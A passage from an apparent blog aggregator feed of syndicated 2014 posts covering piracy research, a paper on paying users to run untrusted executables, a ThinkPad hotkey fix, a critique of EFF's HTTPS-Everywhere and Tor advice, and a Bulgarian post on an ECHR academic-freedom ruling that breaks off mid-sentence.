A little virustotal.com and urlquery.net research on dodevelopments.com told me everything I needed to know, pure Lithuanian evil in the form of IP address 5.199.165.239.  
A bit of trekking through all the malicious exe’s known to be associated with that IP address and voila, I had my source.

See Jared Greenhill‘s writeup on these same concepts at EMC’s RSA Security Analytics Blog and our own Lenny Zeltser‘s Analyzing Malicious Documents Cheat Sheet where I first learned about OfficeMalScanner. Prior related diaries also include Decoding Common XOR Obfuscation in Malicious Code and Analyzing Malicious RTF Files Using OfficeMalScanner’s RTFScan (Lenny is El Jefe).

I hope to see some of you at SANSFIRE 2014. I’ll be there for the Monday evening State of the Internet Panel Discussion at 7:15 and will present C3CM Defeating the Command, Control, and Communications of Digital Assailants on Tuesday evening at 8:15.

Russ McRee | @holisticinfosec

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

TorrentFreak: Digital Content Online Should Be Free, Children Say

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

download-keyboardThe results of a new survey commissioned by YouGov SixthSense on the file-sharing and content consumption habits of citizens in the UK have just been published.

Among broader issues, the study, which draws on a sample of 1,907 adults over 16 years old and 614 children aged between 8 and 15, looked at reasons why people use file-sharing sites, plus attitudes towards piracy and paying for content.

Online content should be free

The headline finding presented YouGov suggests that half of the up-and-coming generation believes that the Internet should be a content free-for-all. A total of 49% of the 8 to 15-year-olds questioned said that they believe that people should be able to download the content they want from the Internet for nothing.

Drilling down specifically into attitudes towards file-sharing sites, 6% of children said that using them is easy, with 7% agreeing that it had become the normal thing to do.

Interestingly, YouGov found that when questioning the 16-year-old and above group, the attitudes towards free content were the same, with an identical 49% stating that online content should be free to download.

Motivations to share files

The survey found that the major driver for use of file-sharing sites is cost. While adults tend to have the most disposable income, 51% said that they use file-sharing sites to save money.

Among the children, whose resources are often more limited, 44% said their motivation was financial, with a quarter of 16-24 year olds reporting that file-sharing is the only way they can afford to access content online.

Unsurprisingly, the issue of accessibility came in at a close second place for both groups. The speed and convenience of file-sharing was cited as a key motivator for use by 41% of adults and 38% of the children.

Attitudes towards piracy and sanctions

The mainstream entertainment companies invariably insist that downloading movies and music without permission is tantamount to stealing. However, when it comes to the UK’s children the survey suggests that Big Entertainment has a mountain to climb to have that notion widely adopted. While 16% of children accept that it’s wrong to obtain content for free without the creator’s permission, just 7% believe that file-sharing is a form of stealing.

When it comes to punishing someone, somewhere, for the piracy problem, it comes as little surprise that most of the adults feel that the blame should be placed elsewhere. Rather than being punished for illegal downloading themselves, 60% of the 16-24 year-olds said that the companies and websites providing the content should be punished instead.

The future

Despite the favorable cost and convenience of using unauthorized sources, YouGov notes that opportunities exist for content providers to address those issues. Legal alternatives, such as the free ad-supported model offered by Spotify, are being utilized more, and there are signs that people are happy to pay for exclusive content. Among the children, for example, 13% said they would spend their money if that meant supporting an up-and-coming artist.

“Children in this generation have grown up with digital material and are used to having access to what they want, when they want it and for some of the time not paying for it,” says YouGov Research Director James McCoy.

“Whilst they appreciate the issues surrounding piracy and illegal downloads, if they can get away with it, then they will. Why change the habit of a lifetime?”

McCoy says that the challenge for industry moving forward is to find ways to engage and educate this group “in a relevant and non-condescending way.” That can probably be done, it just might take a little while yet.

The Future of Digital Consumption 2014 can be purchased from YouGov.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

TorrentFreak: MPAA Offers $20,000 Grants For “Unbiased” Piracy Research

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

mpaa-logoLate last year a study from European researchers revealed that the Megaupload shutdown had a negative effect on the box office revenues of smaller films.

The researchers suggested that the decrease in sales may be the result of a drop in word-of-mouth promotion from pirates, which affects smaller movies more since they have less advertising budget.

The MPAA wasn’t happy with the media coverage the study generated and went on the defensive citing two Carnegie Mellon University studies to show that piracy harms sales.

Interestingly, it failed to disclose that those findings came from research that was supported by a $100,000 grant from the MPAA.

While we trust that the research is solid, the above shows that academic research plays an important role in the MPAA’s lobbying efforts. For this reason, the Hollywood group has recently started a grants program, hoping to enlist more academics to conduct copyright-related research.

The MPAA is now accepting research proposals on a series of predefined topics. They include the impact of copyright law on innovation and the effectiveness of DMCA takedown notices. The best applications will be awarded a $20,000 grant.

“We want to enlist the help of academics from around the world to provide new insight on a range of issues facing the content industry in the digital age,” says MPAA CEO and former U.S. Senator Chris Dodd.

According to the MPAA boss, academic researchers can contribute to understanding the changes the industry faces by providing unbiased insights.

“We need more and better research regarding the evolving role of copyright in society. The academic community can provide unbiased observations, data analysis, historical context and important revelations about how these changes are impacting the film industry and other IP-reliant sectors,” Dodd notes.

The MPAA clearly sees academic research as an important tool in their efforts to ensure that copyright protections remain in place, or are strengthened if needed.

This outreach to academics may in part be fueled by what their ‘opponents’ are doing. Google, for example, is heavily supporting academic research on copyright-related projects in part to further their own interests.

Both sides clearly steer researchers by giving them precise directions on the grounds they want covered. It’s now up to the academics to make sure that they don’t become pawns in a much bigger fight, and that their research is conducted and results presented in an objective manner.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

Schneier on Security: Paying People to Infect their Computers

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

Research paper: “It’s All About The Benjamins: An empirical study on incentivizing users to ignore security advice, by Nicolas Christin, Serge Egelman, Timothy Vidas, and Jens Grossklags.

Abstract: We examine the cost for an attacker to pay users to execute arbitrary code — potentially malware. We asked users at home to download and run an executable we wrote without being told what it did and without any way of knowing it was harmless. Each week, we increased the payment amount. Our goal was to examine whether users would ignore common security advice — not to run untrusted executables­ — if there was a direct incentive, and how much this incentive would need to be. We observed that for payments as low as $0.01, 22% of the people who viewed the task ultimately ran our executable. Once increased to $1.00, this proportion increased to 43%. We show that as the price increased, more and more users who understood the risks ultimately ran the code. We conclude that users are generally unopposed to running programs of unknown provenance, so long as their incentives exceed their inconvenience.

The experiment was run on Mechanical Turk, which means we don’t know who these people were or even if they were sitting at computers they owned (as opposed to, say, computers at an Internet cafe somewhere). But if you want to build a fair-trade botnet, this is a reasonable way to go about it.

Two articles.

Bradley M. Kuhn's Blog ( bkuhn ): Resolving Weirdness In Thinkpad T60 Hotkeys

This post was syndicated from: Bradley M. Kuhn's Blog ( bkuhn ) and was written by: Bradley M. Kuhn. Original post: at Bradley M. Kuhn's Blog ( bkuhn )

In keeping with my tendency to write a blog post about any technical issue
I find that takes me more than five minutes to figure out when searching
the Internet, I include below a resolution to a problem that took me,
embarrassingly, nearly two and half hours across two different tries to
figure out.

The problem appeared when I took Debian 7 (wheezy) laptop hard drive out
of an Lenovo Thinkpad T61 that I was using that failed and into Lenovo
Thinkpad T60. (I’ve been trying to switch fully to the T60 for everything
because it is supported by Coreboot.)

src="http://ebb.org/images/thinkpad-t60-keyboard-show-volume-keys.png"
alt="image of a Lenovo T60 Thinkpad keyboard with volume buttons circled in purple."/>

When I switched, everything was working fine, except the volume buttons on
the Thinkpad T60 (those three buttons in the top left hand corner of the
keyboard, shown circled in purple in the image on the right) no longer did
what I expected. I expected they would ultimately control PulseAudio volume,
which does the equivalent of pactl set-sink-mute 0 0 and
appropriate pactl set-sink-volume 0 commands for my sound card.
I noticed this because when PulseAudio is running, and you type those
commands on the command line, all functions properly with the
volume, and, when running under X, I see the popup windows coming
from my desktop environment showing the volume changes. So, I knew nothing
was wrong with the sound configuration when I switched the hard drive to a
new machine, since the command line tools worked and did the right things.
Somehow, the buttons weren’t sending the same commands in whatever manner
they were used to.

I assumed at first that the buttons simply generated X events. It turns
out they do, but the story there is a bit more complex. When I
ran xev I saw those buttons did not, in fact, generate any X
events. So, that makes it clear that nothing from X windows
“up” (i.e, to the desktop software) had anything to do with the
situation.

So, I first proceed to research whether these volume keys were supposed to
generate X events. I discovered that there were indeed XF86VolumeUp,
XF86VolumeDown and XF86VolumeMute key events (I’d seen those before, in
fact, doing similar research years ago). However, the advice online was
highly conflicting whether or not the best way to solve this is to have
them generate X events. Most of the discussions I found assumed the keys
were already generating X events and had advice about how to bind those
keys to scripts or to your desktop setup of
choice id="return-crunchbang-arch-advice-forums">0.

I found various old documentation about the thinkpad_acpi
daemon, which I quickly found quickly was out of date since long ago that
had been incorporated into Linux’s ACPI directly and didn’t require
additional daemons. This led me to just begin poking around about how the
ACPI subsystem for ACPI keys worked.

I quickly found the xev equivalent for
acpi: acpi_listen. This was the breakthrough I needed to
solve this problem. I ran acpi_listen and discovered that
while other Thinkpad key sequences, such as Fn-Home (to
increase brightness), generated output like:

video/brightnessup BRTUP 00000086 00000000 K
video/brightnessup BRTUP 00000086 00000000

but the volume up, down, and mute keys generated no output. Therefore, it’s
pretty clear at this point that the problem is something related to
configuration of ACPI in some way. I had a feeling this would be hard to
find a solution for.

That’s when I started poking around in /proc, and found
that /proc/acpi/ibm/volume was changing each time I
hit a these keys. So, Linux clearly was receiving notice that these keys
were pressed. So, why wasn’t the acpi subsystem notifying anything else,
including whatever interface acpi_listen talks to?

Well, this was a hard one to find an answer to. I have to admit that I
found the answer through pure serendipity. I had already
loaded this
old bug report for an GNU/Linux distribution waning in popularity
and
found that someone resolved the ticket with the command:

cp /sys/devices/platform/thinkpad_acpi/hotkey_all_mask /sys/devices/platform/thinkpad_acpi/hotkey_mask


This command:

# cat /sys/devices/platform/thinkpad_acpi/hotkey_all_mask /sys/devices/platform/thinkpad_acpi/hotkey_mask 
0x00ffffff
0x008dffff


quickly showed that that the masks didn’t match. So I did:

# cat /sys/devices/platform/thinkpad_acpi/hotkey_all_mask > /sys/devices/platform/thinkpad_acpi/hotkey_mask 


and that single change caused the buttons to work again as expected,
including causing the popup notifications of volume changes and the like.

Additional searching
show this
hotkey issue is documented in Linux, in its Thinkpad ACPI
documentation
, which states:

The hot key bit mask allows some control over which hot keys generate events.
If a key is “masked” (bit set to 0 in the mask), the firmware will handle it.
If it is “unmasked”, it signals the firmware that thinkpad-acpi would prefer
to handle it, if the firmware would be so kind to allow it (and it often
doesn’t!).

I note that on my system, running the command the document recommends to
reset to defaults yields me back to the wrong state:

# cat /proc/acpi/ibm/hotkey 
status:         enabled
mask:           0x00ffffff
commands:       enable, disable, reset, <mask>
# echo reset > /proc/acpi/ibm/hotkey 
# cat /proc/acpi/ibm/hotkey 
status:         enabled
mask:           0x008dffff
commands:       enable, disable, reset, <mask>
# echo 0xffffffff > /proc/acpi/ibm/hotkey

So, I added that last command above to restore it to enabled Linux’s control
of all the ACPI hot keys, which I suspect is what I want. I’ll update the
post if doing that causes other problems that I hadn’t seen before. I’ll
also update the post to note whether this setting is saved over reboots, as
I haven’t rebooted the machine since I did this. :)


href="http://ebb.org/bkuhn/blog/2014/06/08/volume-hotkeys-thinkpad-t60.html#return-crunchbang-arch-advice-forums">0Interestingly, as has
happened to me often recently, much of the most useful information that I
find about any complex topic regarding how things work in modern GNU/Linux
distributions is found on the Arch or Crunchbang online fora and wikis. It’s
quite interesting to me that these two distributions appear to be the primary
place where the types of information that every distribution once needed to
provide are kept. Their wikis are becoming the canonical references of how a
distribution is constructed, since much of the information found therein
applies to all distributions, but distributions like Fedora and Debian
attempt to make it less complex for the users to change the
configuration.

TorrentFreak: Piracy Takedown Notices Increase E-Book Sales, Research Finds

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

book-pirateIn an attempt to limit the availability of pirated content, copyright holders send millions of takedown requests to online services every week.

The effectiveness of these anti-piracy measures is often in doubt, since the pirated files usually reappear quickly elsewhere. But, according to new research they do have some effect.

Imke Reimers, an economics researcher affiliated with NBER and Northeastern University, examined the effectiveness of these takedown notices on book sales. The results, published in the working paper “The Effect of Piracy Protection in Book Publishing,” show that e-books sales increase as a result of the takedown efforts.

In her research Reimers compares sales of book titles before and after takedown notices are issued, to see the effect on book sales across different titles, genres and formats. The study is the first of its kind and reaches the conclusion that piracy protection increases e-book sales.

“This paper is the first to empirically analyze the interaction of online piracy and the legal market for books. It finds that piracy protection significantly increases regular unit sales of e-books, while the effect on physical formats is not as clear,” Reimers writes.

“E-books, the closest substitute for online piracy benefit from piracy protection by selling 15.4% more units, while there is no significant effect on other formats,” she adds.

A 15 percent increase in e-book sales is quite significant, and translates to millions of dollars in revenue across the industry. For other book formats, including hardcovers, paperback and audiobooks, no sales increase was observed.

The research controlled for a wide variety of third-party variables that could have influenced the results. Based on the current data Reimers is confident that the sales increase can indeed be attributed the takedown notices. However, she also spots differences in the impact on established and starting writers.

More specifically, piracy doesn’t appear to pose a threat to the e-book sales of starting authors and could even serve as a promotional tool.

“The effect varies by the title’s level of popularity. For well-known books and those by popular authors, online piracy mainly poses a threat to regular book sales, while authors who are just starting out could benefit from the additional platform. My results support this idea, at least for e-books,” Reimers writes.

TorrentFreak reached out to Reimers who notes that it might be a good idea for some authors to share some of their work online.

“I find no evidence that piracy protection is ‘bad’ for any books, but it seems that more obscure titles could benefit from the advertising effect of pirated versions. Some emerging authors offer their titles or excerpts of their titles for free on their websites – exactly to advertise their works. My results suggest that this might be a smart move,” she tells us.

The research is based on data from Digimarc, one of the leading piracy protection firms for the book industry. Needless to say, the company is happy to hear that their efforts indeed appear to have an effect.

“This new research strongly validates our position that Digimarc Guardian’s anti-piracy strategies provide a substantial return-on-investment for customers, in the form of increased legitimate sales and revenue,” Chris Shepard, Director of Product Management at Digimarc, informs us.

Digimarc assured TorrentFreak that they had no hand in the academic research other than providing the piracy takedown data.

The sales data used for the research comes from the leading independent e-book publisher RosettaBooks. Needless to say, they are also happy with the results.

“Rightsholders feel exposed or taken advantage of by piracy. We believe that Digimarc’s services improve our overall sales and the effect of dampened piracy greatly exceeds the cost of the service,” Greg Freed, eBook Production and Distribution Director at RosettaBooks tells TorrentFreak.

While the research indicates that takedown notices can have a positive effect on e-book sales, future research will have to show whether or not this can be generalized to other industries, including the movie and music business.

In any case, with the above in mind it’s expected that the volume of takedown notices will only increase in the near future, a trend that has been going on for several years now.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

The Hacker Factor Blog: EFF’ing Up

This post was syndicated from: The Hacker Factor Blog and was written by: The Hacker Factor Blog. Original post: at The Hacker Factor Blog

The Electronic Freedom Foundation (EFF) is a very important organization to those of us who care about technology, security, and privacy. I primarily know about their legal efforts — protecting free speech, fair use, and civil rights. If you’re a security researcher, then you know that any moment some big corporation may choose to sue you for reporting an exploit rather than addressing their vulnerabilities. Apple has sued security researchers. Microsoft used to threaten to sue (and left open the potential to do it again). Epic Games, Cisco, and many other big companies have tried to sue people who report vulnerabilities. When this happens, we inevitably run to the EFF for assistance and guidance.

The EFF usually has a very visible position at most big security conferences and they are well-known in the security community. While I rarely donate to any organizations, I have donated to the EFF because they are needed and they do very good work.

Well… they usually do good work…

Oh, so close!

Beyond their legal actions, exposes, and topical news reports, they also provide a cute web plug-in, developed in collaboration with the Tor Project, called “HTTPS-Everywhere“. The idea is that it forces your web browser to use HTTPS rather than HTTP.

I have previously mentioned many of the limitations with HTTPS: it doesn’t reliably validate connections, it permits the human to bypass detected security risks, it is vulnerable to man-in-the-middle connection hijacking, and that little lock symbol really doesn’t mean you are secure.

As security goes, HTTPS is “better than nothing” security. Treat it like that little lock on your front door — it stops someone from easily opening the door. But it doesn’t stop someone from picking the lock, kicking in the door, listening to you through the door, or climbing in the open window next to the door.

Before Google forced everyone to use HTTPS, they offered both HTTP and HTTPS for accessing google.com. Using this plug-in, it would send you to HTTPS rather than HTTP. The same goes for eBay, PayPal, and many other sites. Lots of sites offer both HTTP and HTTPS, but few sites force you to use HTTPS when HTTP is available. In effect, this plug-in forces you to use security-by-placebo rather than no security at all.

My current irk with HTTPS-Everywhere is that the developers do not seem to be testing their code before releasing it. I recently learned that they have a rule file named Hacker-Factor.xml. This rule forces users who access my FotoForensics site to use HTTPS instead of HTTP. This is a big problem.

While FotoForensics does run both HTTP and HTTPS servers, these two interfaces do not provide the same services. “HTTP” is for the public. As clearly specified in the FAQ, the public service is public. It is not private, it offers no privacy, it is explicitly a research site, and it does not offer logins to the public.

In contrast, my HTTPS server demands a login. You won’t get to the upload page or any of the other features without login credentials. (Logins to that server are strictly limited to administrators and research partners.) With my server, you need HTTPS to access the login interface.

Forcing the Point

There is no rule that says the HTTP and HTTPS servers must provide the same content. In fact, many sites today are like mine: HTTP is for the public, and HTTPS are for users who need to login. Today, I cannot login to my bank’s web site without using HTTPS. With HTTP, I see their site, but I must switch to HTTPS to see the login. I cannot login to Google or Twitter or Facebook without HTTPS. Even most news sites use HTTP for public content but you must use HTTPS if you want to login. It is not uncommon to see very different content when using HTTPS instead of HTTP.

By forcing users to the HTTPS service at FotoForensics, HTTPS-Everywhere prevents people from using FotoForensics. Moreover, I know that I’m not the only web service out there that uses HTTP for public information and HTTPS for private access.

(I should point out that Buzzfeed.com forces users to HTTP. HTTPS at cnn.com doesn’t work. Reddit.com still uses HTTP, even for logins. And pay.reddit.com displays very different content depending on whether you use HTTP or HTTPS.)

As far as I can tell, someone associated with HTTPS-Everywhere did do a little testing with their Hacker-Factor.xml rules. They noted in their configuration file that I use a self-signed certificate. A self-signed certificate is typically considered “bad”. Except that I also use client-side certificates, which is much stronger security than third-party authentication without client-side certificates. (Also, I don’t see any point in paying a third-party certificate provider for a certificate that isn’t secure.) In effect, I have two-part authentication: something you have (the client-side certificate) and something you know (login credentials). While the EFF noticed my self-signed cert, they did not notice that they couldn’t use the HTTPS site!

I noticed this today when a user complained, so I filled out a trouble ticket, letting them know that the configuration for my site was incorrect. (The “reported by: cypherpunks” is their generic account for people who do not want to register a login with their trouble-ticket service.) They closed it out shortly after, with no change and the comment, “it won’t prohibit the vast majority of people from visiting the site.” I guess they missed the part that prohibiting ANYONE from accessing my site is a flaw in their rule-set!

Bad Advice

The other thing that got me looking at the EFF was a tweet they made today:

One year after the first Snowden disclosure, we need a web that resists NSA spying. Fight back. Run a Tor relay. https://eff.org/tor

Wow… does the EFF really not understand what Tor does?

The folks at the Tor Project have a wonderful description of their process. Tor mixes up the path between your computer and the remote system you are accessing. Let’s assume that there is someone who can watch all network traffic. What will they be able to tell about your online activities:

  • They will see that your computer is connecting to a Tor server. But they won’t know what you are doing. The data between you and the Tor server is encrypted.

  • The Tor network is like a giant mixer. One node passes to another node passes to another node… And since everyone is getting mixed up, someone watching the network traffic will see you and lots of other people (and other Tor nodes) all connect to the same Tor nodes, but they won’t know which continuing traffic belongs to you. Your trail vanishes into anonymity.
  • Eventually your traffic will reach an “exit node”. This is where it leaves the Tor network and connects to your desired server. The observer sees lots of exit nodes and lots of exit traffic — they don’t know which one belongs to you.

In this regard, Tor offers great security: an observer can see you enter, but doesn’t know what you sent or where you went. They can see lots of people exiting the Tor network, but they cannot identify which exit request is yours. It’s like being pursued by bloodhounds, getting into a car, and driving into rush-hour traffic — the dogs will lose your scent.

(For you deep-security folks, I’m ignoring potential connection leaks via applications that do not use Tor for DNS, or other things you run that do not pass through the Tor tunnel.)

Insecure-Tor

If your path is secure, then that means you are secure, right? Well, no.

Eventually your network traffic must exit the Tor network. At that point, it’s just as secure as connecting directly. If you connect to your bank or your Reddit account, then someone watching the traffic will see your login credentials used at that service. The omnipotent observer will see you connect to Tor “going somewhere” and your credentials being used to check your email at Yahoo. At this point, they don’t need a high IQ to know it is you. (It’s like catching a bank robber who fled the scene after being identified. The cops won’t go chasing you. They’ll just send someone over to watch your house — you’re bound to go home sometime…)

Last January, there was a report about some evil Tor exit nodes. Remember: the exit nodes can watch you leave the system and they can explicitly see where you are going. According to the report, some Swedish researchers managed to find “at least 22 corrupt exit nodes that were tampering with encrypted traffic leaving the supposedly private Tor network.”

Tor nodes are run by volunteers, and there is no vetting involved. If you want to run a Tor node, you can. If you want to be an exit node, that’s allowed. And if you want to watch all traffic that leaves your exit node, there’s nothing stopping you. In the case with the Swedish researchers, they found some nodes that were intentionally altering the data that you wanted to receive.

I’d say that this is earth-shattering news, except that it isn’t. This type of exploit has been reported in 2012, and 2011 (with sample code), and pretty much every year since Tor started.

Back in 2007, one Swedish guy ran a Tor exit node and was capturing login credentials. Among other things, he saw login credentials to embassies all over the world.

You are… The Weakest Link!

At this point, Tor is only as secure as your connection to the server. If you use HTTP over Tor and you do anything that identifies yourself (fill out a form that requires your name, enter your email address, login to a service, check Facebook, do an ego-search to see who is talking about you…) then you’ve just compromised any security that Tor was providing. Someone watching the network traffic will know it was you.

Using something like HTTPS-Everywhere can help a little. It will stop you from forgetting to use HTTPS for certain web sites. However, virtually nobody uses HTTPS with client-side certificates. And without client-side certificates, it is relatively easy for someone on the network between Tor and your bank to hijack your network connection. (For the attacker, you don’t sit and wait for “Neal” to login… You hijack everyone and eventually you’ll also catch “Neal”.) Moreover, if someone is smart enough to configure a Tor exit node and monitor traffic, then they are certainly smart enough to hijack your HTTPS connection. (We’re not talking about an extreme level of difficulty here; any beginner-admin can learn to do this in a few hours.)

Run or Run Away

In their tweet, the EFF recommends that people run their own Tor relays. This will make the mixer network larger and makes tracking network traffic more difficult. However, what does it do for privacy and to your network traffic?

  • Tor consumes network bandwidth. I hope you have a high-speed network connection, because most residential users can either run a Tor relay or watch NetFlix, but you won’t have enough bandwidth for both.

  • Tor has entry, middle, and exit nodes. Someone on an entry node can see you enter the network, but not where you are going. An exit node can see where you go and what you are doing, but not where the request came from. Meanwhile, a middle node sees anonymous traffic coming in and anonymous traffic going out. (Until I learn of an exploit, the middle nodes are safe enough.) If you run an exit node, then you can observe all network traffic between the outside world and your exit node. And you have the ability to interfere with network traffic.

    As a Tor user, you don’t know who owns the exit nodes or what they are doing. “Assuming” it is safe does not make it safe.

  • As an exit node, you cannot control where people go or what they want to download. If they download child porn, then it will look to the omnipotent network gods as if you (the owner of the exit node) downloaded child porn. (Better leave the front door unlocked since it’s expensive to repair a kicked-in door after the police arrive.)
  • My contract with my Internet Service Provider (ISP) explicitly forbids me from sharing my network connection with other people outside my home. I cannot legally run a free WiFi access point for my neighbors or even run a public web service. That’s the same with most residential ISPs. The EFF’s suggestion for you to run a Tor node will likely be in violation of your ISP service agreement. (You’re running a network service and permitting the world to use your network connection.)

What my client meant to say…

Perhaps the EFF meant to tell people to use Tor and misspoke when they say to run a Tor relay… In that case, there are still two issues: speed and security. With regards to speed, Tor is really slow on its good days.

But then there is that pesky exit-node issue. Without Tor, I can connect to my bank from my home. I can be fairly confident that nobody is intercepting or hijacking the connections, and it is as safe as HTTPS (without client-certs) allows. But with Tor, I cannot trust the exit nodes. HTTPS will not notify me if the initial connection is hijacked and the exit node has a great opportunity for hijacking the connection.

Moreover, Tor nodes are run by volunteers all over the Internet. I have no idea who they are, what networks my login credentials are passing over, or who might be watching. As far as I know, there is no way to identify all of the networks that my packets touch. While I do use Tor for anonymous network access, I would never trust it in its current state for anything that requires identifiable information.

For more specific paranoia, consider this: If I connect directly from my home to my bank, I can use traceroute and identify that my packets never leave this country. Yes, corporations that run the networks may see my traffic, but I don’t have to worry about foreign governments. In contrast, if I use Tor and it randomly selects an exit node in Taiwan, then governments in Taiwan, China, Europe, and every other country can spy on my connection as the packets leave a distant Tor exit node and connect to my local bank. With Tor, there are a lot more options for people to watch my online activities and hijack the connection. Without Tor, I only have to worry about my local networks.

Focal Points

I typically trust the EFF’s judgment. Their legal advice and concerns about privacy, security, and technology are usually spot-on. And when the EFF speaks, people should listen.

However, as with anyone else, their suggestions are not always 100% reliable. Forcing people to use HTTPS on an HTTP-only service breaks access to the service. Releasing a HTTPS-Everywhere rule without testing it first seems like a really bad idea, and not patching it when told that the rule does not work seems willfully-ignorant. And while I agree that we need a more secure version of the Internet, Tor is not the solution. Advising people to run a Tor node without identifying the impact and risks seems like a huge mistake to me.

Perhaps I am just over-reacting. But it seems to me that the EFF just gave out some very bad advice.

TorrentFreak: Young Swedes Who Never File-Share Up By 40%

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

piracydownSweden has long been a central figure in the file-sharing phenomenon, not least due to its associations with the The Pirate Bay. As a result, for more than ten years sharing files has been a popular pastime with many young Swedes, much to the disappointment of the world’s largest entertainment companies.

The Cybernorms research group at Lund University in Sweden has been in the news several times during the past few years as a result of its work with The Pirate Bay. On more than one occasion the infamous torrent site as renamed itself to The Research Bay in order for researchers to collect information on the values, norms and conceptions of the file-sharing community.

Cybernorms have now revealed more of their findings which suggest that after years of escalation, online sharing by those in the 15-24 year-old bracket could be in decline.

Survey responses from around 4,000 individuals suggest that the number of active file-sharers has dropped in the past two years. Those who share files daily or almost daily has decreased from 32.8 percent in 2012 to 29 percent in 2014.

“It is a small but significant decrease,” Måns Svensson, head of Cybernorms at Lund University told SVT.

Perhaps the most interesting aspect of the decrease is the mechanism through which it was encouraged. Historically, entertainment industry scare tactics have been employed to try to reduce unauthorized sharing, but the researchers believe something much more positive is responsible.

“What is interesting is that this is the first time we have been able to see that file-sharing has gone down but without that being associated with a conviction, such as the Pirate Bay ruling,” Svensson says.

“If you listen to what young people themselves are saying, it is new and better legal services that have caused the decrease in file-sharing, rather than respect for the law. There has been a trend where alternative legal solutions such as Spotify and Netflix are changing consumption patterns among young people.”

Also of interest is the apparent effect on up-and-coming youngsters who might otherwise have begun file-sharing themselves. The researchers found that between 2009 and 2013 the percentage of young people who never share files illegally increased from 21.6 percent to 30.2 percent, a boost of well over a third.

Interestingly, in that same four-year period, the percentage of young people who said they believe that people should not share files because it is illegal dropped from 24 percent to 16.9 percent. So, even while young people are sharing files less often, their acceptance of the standards presented by the law appears to be dropping too.

In this case it does indeed appear that the carrot is mightier than the stick.

Image credit

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

[Медийно право] [Нели Огнянова]: ЕСПЧ: за академичната свобода и правото да се критикуват решения на съда

This post was syndicated from: [Медийно право] [Нели Огнянова] and was written by: nellyo. Original post: at [Медийно право] [Нели Огнянова]

boyko_boev

Бойко Боев (Софийски университет, 2000 u  Columbia University School of Law, New York 2004) е юрист, старши експерт в Article 19. Специалист по медийно регулиране, обществени медии, клевета и прозрачност на собствеността на медиите. Анализира медийни закони от около 20 страни от Европа, Близкия Изток, Африка и Азия за тяхното съответствие с международното право и стандартите в областта на свободата на изразяване.  Има опит като адвокат в областта на  правата на човека.


*

На 27 май 2014 г. втори състав на Европейският съд за правата на човека се произнесе по дело Mustafa Erdoğan and others v Turkey , касаещо академичната свободата и правото да се критикуват решения на съда. Решението обяснява връзките между „академична свобода“ и „свобода на изразяване“ и подчертава, че „академичната свобода“ са ползва с най-голяма защита дори когато става дума за споделяне на мнения пред широката аудитория. Макар че Съдът отново подчерта, че защитата на доброто име на съдиите е важно за функционирането на правовата държава, в това дело е защитено правото на мнение на професор по конституционно право, който счита, че конституционните съдии в Турция са некомпетентни и политически зависими.

Делото

Жалбата в Страсбург е подадена от турски професор по конституционно право и от редактора и издателя на списание, които се оплакват от осъждане за клевета и обида. Поводът е публикация на професора, в която той критикува решението на конституционния съд за закриване на политическата партия на Добродетелта.
Припомняме, че въпросната партия беше парламентарно представена в края на деветдесетте. Тъй като тя беше ислямистка, участието й в политиката беше възприемано като предизвикателство за светските устои на турската държава. Някои изказвания на нейни членове и отказът на заместник-председателката й да заседава в парламента без забрадка имаха силен обществен отзвук.

През 2001 г. по искане на прокуратурата Конституционният съд закри партията и ограничи правото на нейни членове да участват в политическия живот, намирайки противоречия с разпоредбите на конституцията, които защитават светската власт в страната.
Решението на Конституционния съд, което било очаквано с нетърпение от обществото в продължение на няколко години, предизвиква широко обсъждане. Професорът по конституционно право се включва в този дебат като пише статия, в която критикува решението като излага правни и политически аргументи за това, позовавайки се включително на практиката на Европейския съд. След публикацията всички конституционни съдии подават граждански иск срещу автора, редактора и издателя на списанието, твърдейки, че статията е засегнала честта и достойнството им като съдии.
Първоинстанционният съд в Анкара намира, че правото на добро име на конституционните съдии е било нарушени, посочвайки части в статията, в които авторът говори за натиск върху съда от страна на военните в Турция и поставя под въпрос професионалните качества и интелектуални възможности на съдиите. Ответниците са осъдени да платят обезщетение. Тази присъда е потвърдена от второинстанционния съд.

Решение

Европейският съд намира, че е налице вмешателство в правото на жалбоподателите на свобода на изразяване и че то е основано на закона и преследва законосъобразна цел – защита на достойнството и правата на другите.
Въпросът, който съдиите изследват, е дали въпросното вмешателство е било „необходимо в демократичното общество“. Съдът изтъква, че свободата на изразяване е една от главните основи на демократичното общество и едно от основните условия за неговия прогрес и за личното развитие на всеки човек. Това право се прилага към идеи и информация, които са обидни, шокиращи или смущаващи. Съдът подчертава, че трябва да се прави разлика между фактически и оценъчни твърдения. Признавайки свободата на националните органи на преценка, европейските съдии изследват доколко първите са установили справедлив баланс между правото на свобода на изразяване и достойнство.

Съдът отбелязва, че критерият за баланс между двете права е установен в делото Axel Sringer AG v Germany. От значение са:

1.) допринася ли словото към дебат от обществен интерес?,

2.) колко познато е засегното лице и какъв е предметът на публикацията?,

3.) какво е било поведението на засегнатото лице?,

4.) какъв е бил методът за получаване на информацията и нейната проверка?,

5.) какви са съдържанието, формата и последиците от публикацията?,

6.) каква е тежестта на наложената санкция.
Съдът намира, че предметът на публикацията – функционирането на съдебната система – е от обществен интерес. Статията допринася за съществуващия обществен дебат. Засегнати са правата на съдии, чиято професионална компетентност и независимост са поставени под въпрос. Едновременно с това Съдът отбелязва, че авторът на публикацията е професор по право и като такъв е изразил академичната си свобода. Съдът посочва:
